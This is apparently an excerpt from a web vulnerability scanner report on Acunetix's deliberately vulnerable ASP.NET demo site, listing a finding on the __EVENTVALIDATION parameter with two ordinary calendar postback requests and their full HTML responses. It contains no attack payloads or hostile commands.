Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8576&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgBAhB4PddsIZGRkf3l0lWNmFvmLScPaCNZ%2B%2FZ4FnpU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL98N65DQKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHClM%2F9oKDeRXlzL1QJ4YeVHzgAwfj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:57:18 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgBAhB4PddsIZGRkf3l0lWNmFvmLScPaCNZ+/Z4FnpU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL98N65DQKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHClM/9oKDeRXlzL1QJ4YeVHzgAwfj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:White" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8199&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAyKjPTNoIZGRkNup1dt3ao2G6jpwB7KnBwAsFmK8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL9i72NBAK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w840B%2BPqI3XIG21evJguBWu7cJALw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:21:06 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgCAyKjPTNoIZGRkNup1dt3ao2G6jpwB7KnBwAsFmK8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL9i72NBAK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w840B+PqI3XIG21evJguBWu7cJALw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:White" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> 